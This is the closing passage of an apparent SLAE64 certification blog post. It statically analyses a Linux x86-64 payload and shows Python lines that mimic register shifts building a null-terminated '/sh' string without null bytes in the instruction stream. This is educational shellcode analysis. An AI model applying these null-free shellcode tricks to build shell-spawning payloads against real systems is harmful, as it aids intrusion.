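rbx >>= 8                         # shr rbx,0x8   drops the 'A', leaves '/sh\0'
rbx = (rbx << 32) & MASK64        # shl rbx,0x20  moves it to the upper half
rax |= rbx                        # or  rax,rbx

result = struct.pack("<Q", rax)   # bytes as they appear on the stack
print(result)
```

The shift right is what supplies the terminating NULL byte, so none is needed in the instruction stream.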

Not being able to test the code is frustrating, but static analysis is a good exercise in confirming understanding of the assembly language.

This completes the three payload analysis assignment.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

Student ID: SLAE64-1471

